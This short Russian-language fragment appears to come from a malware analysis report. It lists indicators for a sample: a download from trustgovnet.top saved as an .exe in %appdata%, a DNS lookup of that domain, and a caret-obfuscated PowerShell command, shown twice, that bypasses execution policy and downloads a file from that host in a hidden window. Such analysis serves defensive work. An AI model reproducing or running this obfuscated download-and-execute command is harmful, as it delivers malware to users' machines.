Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^e^r^sH^el^L.^exE -^e^Xec^ut^iON^P^O^lICy b^YPa^S^s -^nO^PRofILE ^-^WIndOW^sT^yl^E ^hiD^dEN (N^EW-ob^j^E^Ct sYs^T^eM.NE^t^.web^CLIEn^T).^D^oWnlOa^dfile^('http://trustgovnet.top/...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "pOW^e^r^sH^el^L.^exE -^e^Xec^ut^iON^P^O^lICy b^YPa^S^s -^nO^PRofILE ^-^WIndOW^sT^yl^E ^hiD^dEN (N^EW-ob^j^E^Ct sYs^T^eM.NE^t^.web^CLIEn^T).^D^oWnlOa^dfile^('http://trustgovnet.top/...' (со скрытым окном)